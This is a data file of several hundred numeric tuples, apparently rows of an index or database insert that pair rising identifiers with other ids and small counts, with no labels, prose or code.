(24896504, 1374841142, 1),
(24896526, 3252386809, 1),
(24896528, 3252386809, 1),
(24896560, 1123633542, 1),
(24896710, 2193201697, 2),
(24896820, 2366158852, 1),
(24896860, 757109195, 2),
(24896887, 1374841142, 2),
(24896921, 3024883593, 1),
(24896921, 3024883466, 1),
(24896922, 1324940073, 1),
(24896925, 3024883475, 1),
(24896925, 2297635928, 8),
(24896926, 2297635928, 3),
(24896930, 3475901715, 1),
(24896941, 2644818889, 1),
(24896942, 2644818889, 4),
(24896942, 1837372382, 1),
(24896944, 1837372382, 2),
(24896944, 2644818889, 2),
(24896945, 2644818889, 3),
(24896946, 1837372382, 2),
(24896947, 2644818889, 2),
(24896948, 2644818889, 4),
(24896949, 1837372382, 3),
(24896952, 676177851, 1),
(24897021, 3475901753, 2),
(24897061, 757109195, 2),
(24897117, 1837274001, 1),
(24897118, 1374841142, 2),
(24897127, 876263692, 2),
(24897164, 1837274001, 1),
(24897165, 1837274001, 1),
(24897167, 1837274001, 1),
(24897194, 1374841142, 1),
(24897233, 2366158608, 1),
(24897268, 1837482126, 1),
(24897345, 3024883474, 1),
(24897370, 1054099761, 1),
(24897376, 1374841142, 2),
(24897535, 1439290282, 1),
(24897538, 1439290282, 1),
(24897545, 2499535434, 1),
(24897602, 1123633542, 1),
(24897665, 2499535434, 1),
(24897667, 2584750011, 1),
(24897693, 3427775492, 1),
(24897735, 1539837019, 2),
(24897744, 1427728186, 3),
(24897750, 1427728186, 1),
(24897751, 1427728186, 7),
(24897864, 1406737396, 1),
(24898025, 520974919, 1),
(24898242, 1123633542, 2),
(24898374, 1123633542, 1),
(24898414, 2760155448, 1),
(24898414, 96753435, 1),
(24898466, 3267064321, 1),
(24898474, 676177775, 1),
(24898474, 676177851, 1),
(24898474, 3475901753, 3),
(24898491, 1538308269, 2),
(24898492, 1538308269, 1),
(24898547, 1123633542, 1),
(24898580, 1078646641, 1),
(24898583, 1374841142, 2),
(24898629, 1123633542, 1),
(24898661, 1374841142, 1),
(24898667, 1374841142, 1),
(24898728, 2303379820, 1),
(24898766, 2499535434, 1),
(24898787, 1123633555, 1),
(24898880, 1123633542, 1),
(24898886, 2499535434, 1),
(24898887, 856631529, 1),
(24898987, 786801763, 1),
(24898995, 2760155459, 1),
(24899195, 2637637377, 1),
(24899204, 532202074, 3),
(24899224, 3652617241, 1),
(24899250, 1123631302, 1),
(24899256, 3024883593, 1),
(24899320, 3472744462, 4),
(24899493, 3339975108, 2),
(24899493, 3250575437, 2),
(24899494, 3339975108, 1),
(24899494, 3250575437, 1),
(24899495, 3250575437, 1),
(24899654, 3242976508, 1),
(24899683, 3652617388, 1),
(24899871, 1123631302, 1),
(24899916, 676177851, 1),
(24899941, 1374841142, 2),
(24900161, 1375112542, 1),
(24900176, 1538628086, 1),
(24900245, 1834501559, 1),
(24900299, 1355389698, 1),
(24900389, 3657088733, 1),
(24900471, 2637637376, 1),
(24900532, 3475901715, 1),
(24900605, 3475901859, 1),
(24900638, 676177840, 2),
(24900657, 1374838938, 1),
(24900658, 1374838938, 2),
(24900688, 2499535434, 1),
(24900710, 3657088733, 1),
(24900763, 676177833, 1),
(24900824, 2499535434, 1),
(24900865, 1338304237, 1),
(24901095, 1338304237, 1),
(24901112, 3273261686, 1),
(24901117, 3273261686, 1),
(24901138, 1338304237, 1),
(24901186, 1123631302, 1),
(24901192, 1338304237, 1),
(24901274, 1338304237, 1),
(24901338, 1370049247, 1),
(24901382, 2996485381, 1),
(24901393, 1375112542, 1),
(24901418, 1338304237, 1),
(24901536, 1123631176, 1),
(24901536, 1123631302, 2),
(24901546, 2509959283, 1),
(24901564, 2637637395, 1),
(24901653, 1123631302, 1),
(24901661, 2366158866, 1),
(24901662, 2366148255, 1),
(24901688, 1123631302, 1),
(24901776, 1123631302, 1),
(24901800, 1123631302, 1),
(24901820, 1123631302, 1),
(24901934, 2760155412, 1),
(24901934, 96753435, 1),
(24901974, 1123631302, 1),
(24901989, 1123631302, 1),
(24902096, 1123631302, 1),
(24902164, 2509961939, 3),
(24902202, 1123635091, 1),
(24902268, 1123635091, 1),
(24902275, 2745977448, 1),
(24902276, 2745977448, 2),
(24902286, 676177752, 1),
(24902371, 1123635091, 1),
(24902651, 1375112542, 1),
(24902656, 1463923807, 1),
(24902657, 1463923807, 1),
(24902659, 1463923807, 1),
(24902660, 1463923807, 1),
(24902669, 1837474429, 1),
(24902670, 1837474429, 1),
(24902671, 1837474429, 4),
(24902671, 2521214255, 1),
(24902681, 1375112542, 1),
(24902727, 1375112542, 1),
(24902797, 1374841142, 1),
(24902816, 3492536660, 4),
(24902817, 3492536660, 5),
(24902898, 1834517617, 1),
(24902914, 1123635120, 1),
(24902951, 1375068314, 1),
(24902957, 2297635928, 8),
(24902958, 2297635928, 1),
(24903072, 2637637394, 2),
(24903155, 2637637394, 1),
(24903181, 1123635091, 1),
(24903335, 100662578, 1),
(24903336, 2945073626, 3),
(24903499, 2366158852, 1),
(24903556, 1815808070, 4),
(24903644, 1123635091, 1),
(24903669, 1123635016, 1),
(24903669, 1123635091, 1),
(24903735, 2961112076, 1),
(24903759, 2989643491, 1),
(24903760, 2989643491, 1),
(24903782, 1123635091, 2),
(24903792, 2513062086, 1),
(24903792, 1123635091, 1),
(24903838, 1538628281, 2),
(24904001, 676177754, 2),
(24904094, 3567661094, 2),
(24904115, 1152705560, 1),
(24904118, 1152705560, 1),
(24904154, 1554035825, 1),
(24904234, 3587417960, 2),
(24904235, 3587417960, 1),
(24904262, 3024883462, 1),
(24904329, 1123631302, 1),
(24904443, 1375112542, 1),
(24904448, 1375112542, 1),
(24904453, 1123631302, 1),
(24904468, 1834596154, 1),
(24904475, 1834596154, 3),
(24904512, 1837484288, 1),
(24904538, 1375112542, 1),
(24904585, 1123631302, 1),
(24904645, 2509961370, 2),
(24904646, 2509961370, 3),
(24904649, 2509961370, 2),
(24904717, 1123631302, 2),
(24904723, 676177671, 1),
(24904753, 1123631302, 1),
(24904814, 1123631302, 1),
(24904826, 1311661259, 1),
(24904907, 1123631302, 1),
(24904998, 1123631302, 1),
(24905038, 1123631302, 1),
(24905061, 1837931087, 3),
(24905062, 1837931087, 2),
(24905063, 1837931087, 1),
(24905066, 1123631302, 1),
(24905087, 96753435, 1),
(24905152, 1837924479, 1),
(24905168, 736163900, 1),
(24905231, 3427775560, 1),
(24905233, 3475901715, 1),
(24905310, 1123631302, 1),
(24905386, 1123631176, 1),
(24905386, 1123631302, 1),
(24905443, 2637637383, 2),
(24905448, 1796538632, 1),
(24905472, 3259896531, 2),
(24905473, 3259896531, 1),
(24905474, 3259896531, 2),
(24905475, 3259896531, 1),
(24905478, 3259896531, 2),
(24905618, 856638340, 1),
(24905620, 1123631302, 1),
(24905674, 1569621950, 1),
(24905683, 3024883617, 1),
(24905781, 2328459013, 2),
(24905839, 3024883482, 1),
(24905839, 3024883475, 1),
(24905890, 3652617392, 1),
(24905927, 1358487954, 10),
(24905957, 1374841142, 2),
(24906047, 1374781696, 1),
(24906052, 1374781696, 1),
(24906053, 1374781696, 2),
(24906167, 676177839, 1),
(24906193, 876257645, 2),
(24906241, 676177839, 1),
(24906448, 3473362978, 1),
(24906459, 3256644604, 1),
(24906476, 1123631313, 1),
(24906567, 1374841142, 2),
(24906752, 3242976508, 1),
(24906880, 1123631302, 1),
(24906907, 1464066970, 1),
(24906956, 3475901715, 1),
(24906962, 676177839, 1),
(24906962, 3475901715, 1),
(24906988, 1374769563, 1),
(24907012, 3475901859, 1),
(24907047, 1374841142, 2),
(24907169, 2509962560, 1),
(24907237, 1374841142, 2),
(24907246, 2996485390, 1),
(24907354, 1357699146, 1),
(24907434, 1374841142, 1),
(24907435, 1374841142, 1),
(24907456, 2919226301, 1),
(24907480, 1838094426, 1),
(24907482, 1838094426, 1),
(24907482, 1389669355, 1),
(24907483, 1389669355, 1),
(24907484, 1389669355, 1),
(24907621, 1837842937, 2),
(24907684, 2637637390, 1),
(24907949, 1338304137, 1),
(24907987, 1152705948, 1),
(24907988, 1152705948, 1),
(24907999, 1374769563, 1),
(24908021, 676177749, 2),
(24908052, 1538358342, 2),
(24908053, 1538358342, 1),
(24908055, 1538358342, 2),
(24908056, 1538358342, 1),
(24908057, 1538358342, 1),
(24908065, 1538358342, 3),
(24908076, 2760158144, 1),
(24908143, 1374841142, 2),
(24908189, 3475901715, 2),
(24908203, 1374841142, 2),
(24908258, 786802763, 1),
(24908258, 3475901698, 1),
(24908270, 1338304137, 1),
(24908377, 3250483553, 5),
(24908405, 2637637389, 2),
(24908425, 1338304137, 1),
(24908445, 2187902172, 4),
(24908446, 2187902172, 3),
(24908447, 2187902172, 4),
(24908448, 2187902172, 1),
(24908592, 1374769563, 1),
(24908594, 2509960075, 1),
(24908642, 1123631630, 1),
(24908655, 1338304137, 1),
(24908698, 1338304137, 1),
(24908752, 1338304137, 1),
(24908776, 1374769563, 1),
(24908795, 1374841142, 2),
(24908798, 1538510707, 1),
(24908834, 1338304137, 1),
(24908978, 1338304137, 1),
(24909022, 1439252500, 2),
(24909032, 2637637389, 1),
(24909333, 1247140480, 1),
(24909349, 1753419235, 6),
(24909350, 1753419235, 3),
(24909455, 1123638677, 1),
(24909455, 1123638679, 1),
(24909459, 632865533, 1),
(24909588, 632842500, 1),
(24909613, 2345094286, 1),
(24909627, 2995861269, 1),
(24909628, 2995861269, 1),
(24909666, 1374841142, 2),
(24909682, 1123631630, 1),
(24909722, 1123631646, 1),
(24909722, 1123631630, 1),
(24909752, 676177697, 2),
(24909796, 96753435, 1),
(24909796, 3652617247, 1),
(24909891, 2366145579, 1),
(24910043, 3024883615, 1),
(24910100, 3587417960, 1),
(24910196, 1123631816, 1),
(24910196, 1123631630, 2),
(24910236, 1123631630, 1),
(24910241, 1123631630, 1),
(24910256, 1374769563, 1),
(24910469, 1123634273, 1),
(24910489, 1123634273, 1),
(24910707, 1123631630, 1),
(24910723, 3475901849, 1),
(24910730, 3475901809, 1),
(24910773, 1123634273, 1),
(24910847, 1358347396, 1),
(24910869, 1358347396, 1),
(24911005, 1838104422, 1),
(24911167, 1834541323, 1),
(24911168, 1834541323, 1),
(24911201, 3024883486, 1),
(24911233, 1607842043, 2),
(24911234, 3024883477, 1),
(24911324, 1358347396, 1),
(24911325, 1358347396, 1),
(24911329, 1358347396, 1),
(24911391, 1358347396, 1),
(24911410, 1358347396, 1),
(24911419, 1358347396, 1),
(24911438, 2366148145, 1),
(24911438, 2366145567, 1),
(24911438, 1570674747, 1),
(24911460, 1358347396, 1),
(24911681, 1796538632, 1),
(24911728, 1374769563, 1),
(24911764, 1374841142, 2),
(24911831, 100662559, 1),
(24911901, 1358347396, 1),
(24912452, 783526296, 1),
(24912538, 2637637568, 1),
(24912563, 584016457, 2),
(24912566, 2955169831, 2),
(24912679, 3154466025, 1),
(24912864, 1123632438, 1),
(24912928, 3024883593, 1),
(24912950, 3652617236, 1),
(24912951, 96753435, 1),
(24913190, 1538649748, 1),
(24913259, 2637637568, 2),
(24913293, 1538626519, 2),
(24913293, 2918995415, 1),
(24913297, 1538626519, 5),
(24913305, 1374841142, 2),
(24913326, 1538626519, 1),
(24913410, 1123632437, 2),
(24913562, 1123632437, 1),
(24913604, 1053970255, 1),
(24913712, 1439270026, 1),
(24913744, 96260934, 2),
(24913745, 96260934, 5),
(24913755, 1123632584, 1),
(24913755, 1123632437, 1),
(24913838, 3154455105, 1),
(24913841, 1054099761, 1),
(24913855, 772030661, 4),
(24913856, 772030661, 5),
(24913867, 1123632437, 1),
(24913871, 1123632437, 1),
(24913926, 2763076217, 1),
(24913927, 1123632437, 1),
(24913981, 2637637384, 2),
(24914024, 96260878, 7),
(24914103, 1407831882, 1),
(24914225, 3267064321, 1),
(24914293, 1538461267, 3),
(24914318, 1374769563, 1),
(24914349, 1078646641, 1),
(24914405, 1123632437, 2),
(24914411, 1123632437, 1),
(24914497, 3587417960, 1),
(24914501, 1123632437, 1),
(24914547, 1123632437, 1),
(24914654, 783531305, 1),
(24914674, 1123633622, 1),
(24914701, 2637637384, 1),
(24914720, 1123633622, 1),
(24914729, 1538592159, 1),
(24914735, 2637637384, 1),
(24914749, 1123633622, 1),
(24914752, 1123633622, 1),
(24914762, 1123633622, 1),
(24914772, 1123633622, 1),
(24914784, 1123633622, 1),
(24914790, 1123633622, 1),
(24914795, 1123633622, 1),
(24914805, 1123633622, 1),
(24914816, 1123633622, 1),
(24914827, 1123633622, 1),
(24914836, 1123633622, 1),
(24914838, 1123633622, 1),
(24914849, 1123633622, 1),
(24914860, 1123633622, 1),
(24914898, 1123633622, 1),
(24914909, 1123633622, 1),
(24914912, 1123633622, 1),
(24914917, 1123633622, 1),
(24914920, 1123633622, 1),
(24914931, 1123633622, 1),
(24914942, 1123633622, 1),
(24914946, 2745959577, 1),
(24914953, 2731721858, 4),
(24914954, 1123633622, 1),
(24914966, 1123633622, 1),
(24914974, 1123633622, 1),
(24914976, 2637637627, 1),
(24915017, 3024883613, 1),
(24915034, 1123633622, 1),
(24915102, 2637637514, 1),
(24915103, 2637637514, 1),
(24915112, 2637637514, 1),
(24915115, 2637637514, 1),
(24915115, 1123633622, 1),
(24915163, 1374841142, 2),
(24915212, 1374769563, 1),
(24915235, 1374841142, 2),
(24915262, 1401140181, 1),
(24915351, 2509961901, 2),
(24915352, 2509961901, 1),
(24915401, 1053115180, 1),
(24915402, 1053115180, 2),
(24915455, 2637637379, 2),
(24915456, 2637637379, 1),
(24915488, 2783008832, 1),
(24915509, 1338303486, 1),
(24915524, 2809328531, 1),
(24915592, 632871405, 1),
(24915643, 96260885, 8),
(24915766, 783517035, 1),
(24915830, 1338303486, 1),
(24915842, 1077858855, 1),
(24915985, 1338303486, 1),
(24916032, 1374841142, 1),
(24916104, 1374769563, 1),
(24916167, 1123631313, 1),
(24916184, 676177839, 2),
(24916194, 3475901809, 1),
(24916215, 1338303486, 1),
(24916258, 1338303486, 1),
(24916278, 2954838202, 1),
(24916312, 1338303486, 1),
(24916394, 1338303486, 1),
(24916506, 96260903, 7),
(24916526, 3024883608, 1),
(24916526, 3024883590, 1),
(24916528, 3024883474, 1),
(24916538, 1338303486, 1),
(24916644, 1374769563, 1),
(24916779, 1374841142, 1),
(24916780, 1374841142, 1),
(24916846, 1375132497, 1),
(24916926, 3492536660, 8),
(24917010, 632936182, 1),
(24917071, 2503519569, 1),
(24917129, 2637637398, 2),
(24917179, 1374841142, 2),
(24917198, 872366417, 1),
(24917198, 96753435, 1),
(24917210, 1123631302, 2),
(24917285, 1584254022, 1),
(24917311, 1342987974, 1),
(24917315, 2297635928, 2),
(24917316, 2297635928, 2),
(24917319, 2297635928, 2),
(24917362, 1796538632, 1),
(24917423, 1374841142, 2),
(24917425, 1374769563, 1),
(24917426, 1834524421, 2),
(24917429, 1123631302, 1),
(24917444, 1538350214, 1),
(24917445, 1538350214, 1),
(24917446, 1538350214, 2),
(24917563, 1374841142, 2),
(24917588, 1123631302, 1),
(24917664, 1123633622, 1),
(24917781, 1123633622, 1),
(24917787, 1538452237, 2),
(24917849, 2637637398, 2),
(24918076, 1539837019, 2),
(24918246, 786801764, 1),
(24918270, 3488736748, 1),
(24918461, 3267064321, 1),
(24918556, 1538646836, 1),
(24918571, 1834607884, 2),
(24918571, 2637637399, 2),
(24918602, 2637637399, 2),
(24918622, 783539426, 1),
(24918689, 2499535434, 1),
(24918756, 532202074, 1),
(24918810, 2499535434, 1),
(24918895, 1123633622, 2),
(24918896, 1374841142, 2),
(24918898, 1374769563, 1),
(24918910, 1374769563, 1),
(24918973, 1374841142, 1),
(24918974, 1374841142, 1),
(24918990, 2637637621, 1),
(24919047, 1123633622, 1),
(24919107, 676177735, 1),
(24919275, 1123633629, 1),
(24919275, 1123633622, 1),
(24919336, 1123633622, 1),
(24919355, 2637637390, 2),
(24919387, 1123633622, 1),
(24919433, 1123631594, 1),
(24919433, 1123633622, 1),
(24919468, 1123633622, 1),
(24919525, 1374769563, 1),
(24919545, 1123633622, 1),
(24919590, 1123633622, 1),
(24919610, 1123633622, 1),
(24919734, 1323276251, 1),
(24919735, 1323276251, 1),
(24919805, 1123633622, 1),
(24919830, 1123633622, 1),
(24919831, 1123633622, 1),
(24919836, 1123633622, 1),
(24919837, 2503517245, 1),
(24919844, 2366145586, 1),
(24919846, 1123633622, 1),
(24919877, 1123633622, 1),
(24919912, 1123633622, 1),
(24919957, 920718086, 1),
(24919963, 1123633622, 1),
(24919979, 1123633622, 1),
(24920000, 1439270754, 1),
(24920009, 1123633622, 2),
(24920040, 1123633622, 1),
(24920169, 2499535434, 1),
(24920213, 872366374, 1),
(24920213, 96753435, 1),
(24920285, 2637637526, 3),
(24920289, 2499535434, 1),
(24920345, 1123635091, 2),
(24920463, 1374841142, 2),
(24920478, 1123635091, 2),
(24920525, 3024883609, 1),
(24920646, 2733899714, 1),
(24920658, 1123635091, 1),
(24920790, 1123635091, 1),
(24920896, 1123635091, 1),
(24920906, 1123635091, 1),
(24920959, 3652617387, 1),
(24920999, 632825899, 1),
(24921011, 1374841142, 2),
(24921097, 1374841142, 2),
(24921140, 1123635016, 1),
(24921140, 1123635091, 1),
(24921150, 3154448177, 1),
(24921159, 3154448177, 1),
(24921164, 3154448177, 1),
(24921240, 3652617288, 1),
(24921262, 1123635091, 1),
(24921282, 1123635091, 1),
(24921344, 1374841142, 2),
(24921358, 1123635091, 1),
(24921445, 1123635091, 1),
(24921496, 1123635091, 1),
(24921623, 1123635091, 1),
(24921658, 1123635091, 1),
(24921781, 1837876689, 2),
(24921790, 1374769563, 1),
(24921905, 2637637494, 2),
(24922145, 1123631630, 1),
(24922146, 1123631630, 1),
(24922336, 621375790, 1),
(24922515, 3024883481, 1),
(24922627, 2637637401, 2),
(24922691, 1374769563, 1),
(24922784, 1123631630, 1),
(24922844, 1374769563, 1),
(24922860, 3024883476, 1),
(24922957, 1094179366, 1),
(24923024, 1123631693, 2),
(24923069, 3657086469, 1),
(24923117, 1374841142, 2),
(24923177, 1538654468, 1),
(24923184, 1439301535, 3),
(24923348, 2637637396, 1),
(24923390, 3657086469, 1),
(24923464, 2328173131, 9),
(24923544, 1123631732, 1),
(24923545, 3657086469, 1),
(24923548, 2637637424, 1),
(24923715, 1123631693, 2),
(24923775, 3657084349, 1),
(24923818, 3657084349, 1),
(24923872, 3657084349, 1),
(24923913, 1123631693, 1),
(24923954, 3657084349, 1),
(24923969, 3267064321, 1),
(24923989, 1123631693, 1),
(24924020, 1427844213, 2),
(24924025, 3003111232, 2),
(24924026, 3003111232, 2),
(24924070, 2637637538, 1),
(24924098, 3657084349, 1),
(24924111, 1123631816, 1),
(24924111, 1123631693, 1),
(24924127, 3495879255, 1),
(24924131, 2499535434, 1),
(24924133, 3242976508, 1),
(24924171, 1538458305, 1),
(24924200, 1123631693, 1),
(24924253, 1123631693, 1),
(24924273, 1538512707, 2),
(24924299, 3166481419, 1),
(24924320, 1123631693, 1),
(24924383, 2644818889, 1),
(24924489, 1123633622, 1),
(24924632, 1374769563, 1),
(24924647, 1374843811, 4),
(24924696, 1538567300, 3),
(24924753, 3492536661, 2),
(24924754, 3492536661, 6),
(24924760, 1374841142, 2),
(24924778, 1123633622, 1),
(24924851, 3003111232, 1),
(24924905, 1123633622, 1),
(24925201, 1123633622, 1),
(24925288, 96753435, 1),
(24925420, 2366145562, 1),
(24925659, 2499535434, 1),
(24925776, 3154495934, 1),
(24925796, 2499535434, 1),
(24925839, 1815808080, 4),
(24925939, 2637637398, 2),
(24925939, 2503517245, 1),
(24926144, 1374769563, 1),
(24926206, 1538608887, 1),
(24926220, 2760155467, 1),
(24926265, 1374841142, 2),
(24926541, 3024883617, 1),
(24926660, 2637637400, 1),
(24926683, 1123633555, 1),
(24927094, 1374769563, 1),
(24927216, 3024883461, 1),
(24927227, 1570674747, 1),
(24927229, 786801765, 1),
(24927290, 2954838202, 1),
(24927451, 1374841142, 2),
(24927461, 1375117429, 2),
(24927466, 1375117429, 2),
(24927469, 1375117429, 2),
(24927517, 1374769563, 1),
(24927525, 2637637424, 1),
(24927603, 2637637424, 1),
(24927673, 1161474618, 2),
(24927674, 1161474618, 7),
(24927826, 3024883603, 1),
(24927970, 1123634231, 1),
(24928274, 1374769563, 1),
(24928343, 1374841142, 2),
(24928403, 1374841142, 2),
(24928515, 3024883471, 1),
(24928520, 1374769563, 1),
(24928548, 3024883600, 1),
(24928552, 3475901894, 2),
(24928587, 1374769563, 1),
(24928898, 1538596638, 1),
(24929120, 1123633950, 1),
(24929150, 1123632579, 1),
(24929150, 1123633950, 1),
(24929273, 2637637388, 2),
(24929283, 1123633950, 1),
(24929421, 1123633950, 1),
(24929460, 1123633950, 1),
(24929499, 2499535434, 1),
(24929537, 872366418, 1),
(24929537, 96753435, 1),
(24929557, 2366145567, 1),
(24929577, 1123633950, 1),
(24929602, 1123633950, 1),
(24929607, 1123633950, 1),
(24929636, 2499535434, 1),
(24929653, 1123632542, 1),
(24929668, 1123632542, 1),
(24929679, 1374769563, 1),
(24929698, 1123632542, 1),
(24929750, 1374769563, 1),
(24929779, 1123632542, 1),
(24929789, 1123632542, 1),
(24929825, 1374769563, 1),
(24929835, 1123632542, 1),
(24929896, 1123632542, 1),
(24929921, 1123632542, 1),
(24929992, 876183356, 1),
(24929993, 876183356, 1),
(24929994, 2637637405, 2),
(24930047, 1834609551, 5),
(24930048, 1834609551, 2),
(24930049, 1834609551, 2),
(24930202, 3587417960, 1),
(24930375, 872366427, 1),
(24930491, 876055784, 1),
(24930494, 2996485392, 1),
(24930629, 1338303462, 1),
(24930714, 2637637509, 1),
(24930776, 2637637406, 3),
(24930814, 2303381350, 1),
(24930950, 1338303462, 1),
(24931105, 3657083455, 1),
(24931146, 1834609551, 3),
(24931157, 1374769563, 1),
(24931267, 2809283056, 9),
(24931268, 2809283056, 2),
(24931283, 1123632542, 1),
(24931335, 3657083455, 1),
(24931378, 3657083455, 1),
(24931432, 3657083455, 1),
(24931514, 3657083455, 1),
(24931556, 1374841142, 2),
(24931653, 1053970098, 10),
(24931658, 3657083455, 1),
(24931693, 3024883599, 1),
(24931872, 918820966, 3),
(24931874, 1374769563, 1),
(24932338, 3472744983, 4),
(24932538, 2637637376, 1),
(24932542, 2637637583, 1),
(24932573, 1538656104, 2),
(24932681, 2637637583, 1),
(24932737, 2509950143, 2),
(24932738, 2509950143, 1),
(24932876, 1374769563, 1),
(24932911, 1123631300, 2),
(24933007, 2071807860, 1),
(24933035, 3373404845, 1),
(24933045, 2071807778, 1),
(24933045, 2071806940, 1),
(24933050, 1584238868, 1),
(24933121, 2637637583, 1),
(24933199, 3024883483, 1),
(24933225, 2509961690, 1),
(24933237, 1450079886, 2),
(24933251, 2366145579, 1),
(24933259, 3475901901, 2),
(24933303, 1374769563, 1),
(24933488, 3024883617, 1),
(24933981, 3475901898, 2),
(24933985, 520974917, 1),
(24934027, 1374841142, 2),
(24934052, 2637637583, 1),
(24934104, 3116152550, 1),
(24934190, 1123631300, 1),
(24934215, 1123631300, 1),
(24934225, 1123631171, 1),
(24934225, 1123631300, 1),
(24934240, 1343201817, 1),
(24934296, 1123631300, 1),
(24934306, 1123631300, 1),
(24934316, 1538375237, 1),
(24934317, 1538375237, 1),
(24934453, 3587417960, 1),
(24934504, 1374769563, 1),
(24934521, 1055638166, 1),
(24934583, 3492536660, 7),
(24934583, 3492536661, 1),
(24934612, 2297635928, 2),
(24934613, 2297635928, 5),
(24934614, 2297635928, 3),
(24934617, 2297635928, 2),
(24934620, 1489403232, 1),
(24934691, 1374769563, 1),
(24934701, 2637637390, 2),
(24934706, 2745959577, 1),
(24934729, 1374841142, 1),
(24934730, 1374841142, 1),
(24934775, 1123631300, 2),
(24934827, 1374761077, 1),
(24934847, 1123631300, 1),
(24934885, 1834549080, 4),
(24934886, 1834549080, 1),
(24934887, 1834549080, 6),
(24934917, 786801765, 1),
(24934943, 1123631300, 1),
(24934953, 1123631300, 1),
(24934964, 2637637583, 2),
(24934989, 1123631300, 1),
(24935422, 2637637376, 2),
(24935604, 3154485134, 1),
(24935607, 1463941451, 1),
(24935694, 3154485134, 1),
(24935739, 3652617366, 1),
(24935739, 96753435, 1),
(24935751, 3154485134, 1),
(24935949, 1538774996, 2),
(24935979, 1356207873, 1),
(24936071, 1538656104, 2),
(24936116, 1123631300, 1),
(24936142, 2637637376, 2),
(24936208, 1374769563, 1),
(24936249, 3154459133, 1),
(24936300, 1837280593, 3),
(24936378, 1123631300, 2),
(24936500, 1815808070, 3),
(24936501, 1815808070, 1),
(24936524, 1123631300, 1),
(24936545, 872367984, 1),
(24936598, 3024883478, 1),
(24936598, 3024883610, 1),
(24936600, 3024883617, 1),
(24936627, 676177711, 1),
(24936637, 1123631300, 1),
(24936880, 1539837019, 2),
(24936917, 1582084616, 3),
(24936973, 1538728574, 2),
(24936974, 1538728574, 2),
(24937040, 1123631171, 1),
(24937040, 1123631300, 1),
(24937209, 2637637376, 2),
(24937211, 1837280593, 1),
(24937240, 2996488252, 1),
(24937240, 2996488256, 2),
(24937241, 1374769563, 1),
(24937449, 2499535434, 1),
(24937562, 1374769563, 1),
(24937650, 1570674724, 1),
(24937768, 1753435673, 8),
(24937769, 1753435673, 1),
(24937927, 3024883468, 1),
(24937930, 3475901896, 1),
(24938144, 2637637417, 1),
(24938189, 3657085691, 1),
(24938264, 1374769563, 1),
(24938319, 1053970255, 1),
(24938348, 3475901750, 2),
(24938349, 3475901750, 1),
(24938391, 2731721828, 2),
(24938510, 3657085691, 1),
(24938574, 2303380418, 1),
(24938636, 1538656104, 2),
(24938650, 3475901896, 1),
(24938665, 3657085691, 1),
(24938842, 3625177169, 1),
(24938854, 1538656104, 2),
(24938895, 3657085691, 1),
(24938927, 1538656104, 2),
(24938938, 3657085691, 1),
(24938992, 3657085691, 1),
(24939021, 1374769563, 1),
(24939028, 3024883611, 1),
(24939034, 1374769563, 1),
(24939035, 1374839056, 4),
(24939036, 1374839056, 6),
(24939037, 1374839056, 1),
(24939074, 3657085691, 1),
(24939095, 3024883471, 1),
(24939218, 3657085691, 1),
(24939372, 2637637526, 1),
(24939409, 1123635012, 2),
(24939436, 1123635012, 1),
(24939463, 1123635012, 1),
(24939486, 1123635012, 1),
(24939509, 1123635012, 1),
(24939530, 1123635012, 1),
(24939550, 1123635012, 1),
(24939570, 1123635012, 1),
(24939611, 2637637583, 1),
(24939680, 1374769563, 1),
(24939720, 1538614733, 1),
(24939813, 3342489299, 1),
(24939814, 3342489299, 1),
(24939829, 3242976508, 1),
(24939836, 2995852746, 1),
(24939861, 1771904328, 3),
(24939862, 1771904328, 2),
(24939863, 1771904328, 1),
(24939910, 783487407, 1),
(24939935, 1538773687, 2),
(24940092, 2637637401, 2),
(24940405, 2637637583, 1),
(24940414, 1053976392, 1),
(24940416, 621375751, 1),
(24940416, 2996488251, 1),
(24940464, 2509960045, 1),
(24940513, 2745959577, 1),
(24940523, 2493742914, 3),
(24940565, 1123631300, 1),
(24940601, 1123631300, 1),
(24940728, 1123631171, 1),
(24940728, 1123631300, 1),
(24940789, 1123631300, 1),
(24940813, 2637637401, 2),
(24940866, 1123631300, 2),
(24940896, 1123631300, 1),
(24941085, 1123631300, 1),
(24941174, 1123631300, 1),
(24941194, 1538457750, 1),
(24941195, 1538457750, 7),
(24941197, 1538457750, 1),
(24941202, 1538457750, 1),
(24941235, 1570674758, 1),
(24941387, 1123631300, 1),
(24941534, 2637637401, 1),
(24941538, 1837280593, 1),
(24941544, 621375758, 1),
(24941767, 1374769563, 1),
(24941768, 1796538632, 1),
(24941808, 3024883598, 1),
(24941974, 2509961569, 1),
(24942072, 1123633540, 1),
(24942073, 1539837082, 1),
(24942078, 2366148185, 1),
(24942124, 1837280593, 2),
(24942190, 1584253342, 2),
(24942254, 2637637401, 1),
(24942270, 1123633540, 1),
(24942370, 1123633540, 1),
(24942532, 2303381358, 1),
(24942532, 96753435, 1),
(24942610, 1374769563, 1),
(24942975, 3475901867, 1),
(24943370, 1374769563, 3),
(24943435, 1123631300, 1),
(24943447, 1837280593, 2),
(24943634, 1123631300, 1),
(24943663, 2954838202, 1),
(24943717, 1768391530, 1),
(24943734, 3644879299, 1),
(24943741, 3115168388, 1),
(24943837, 1123631171, 1),
(24943837, 1123631300, 2),
(24943854, 100662570, 1),
(24943873, 1123631309, 1),
(24943922, 2637637377, 2),
(24943927, 3024883466, 1),
(24943927, 3024883486, 1),
(24943942, 676177679, 1),
(24944008, 1123631300, 1),
(24944008, 2366148185, 1),
(24944008, 2366148131, 1),
(24944039, 1121751541, 1),
(24944053, 3024883477, 1),
(24944125, 1123631300, 1),
(24944205, 676177692, 1),
(24944214, 1439300774, 2),
(24944214, 2919005072, 1),
(24944214, 1121751540, 1),
(24944328, 1123631300, 1),
(24944338, 1355389335, 1),
(24944339, 1355389335, 3),
(24944340, 1355389335, 2),
(24944342, 1355389335, 2),
(24944411, 872366351, 1),
(24944588, 1837280593, 2),
(24944643, 2637637378, 4),
(24944737, 1837280593, 2),
(24944750, 1837280593, 1),
(24944815, 1538596638, 1),
(24944815, 1374769563, 1),
(24945037, 3328203529, 1),
(24945067, 676177770, 2),
(24945101, 3024883487, 1),
(24945240, 2745959577, 1),
(24945684, 2644818921, 3),
(24945685, 2644818921, 4),
(24945689, 2644818921, 3),
(24945749, 1338305248, 1),
(24945803, 96753435, 1),
(24945881, 3567663235, 1),
(24945929, 2071806883, 1),
(24945961, 2071806944, 1),
(24945961, 2071807790, 1),
(24945968, 2637637426, 2),
(24946010, 1463941451, 1),
(24946014, 1463941451, 1),
(24946070, 1338305248, 1),
(24946076, 3024883608, 1),
(24946183, 2366148111, 1),
(24946226, 1338305248, 1),
(24946240, 1427778051, 1),
(24946260, 3652617456, 1),
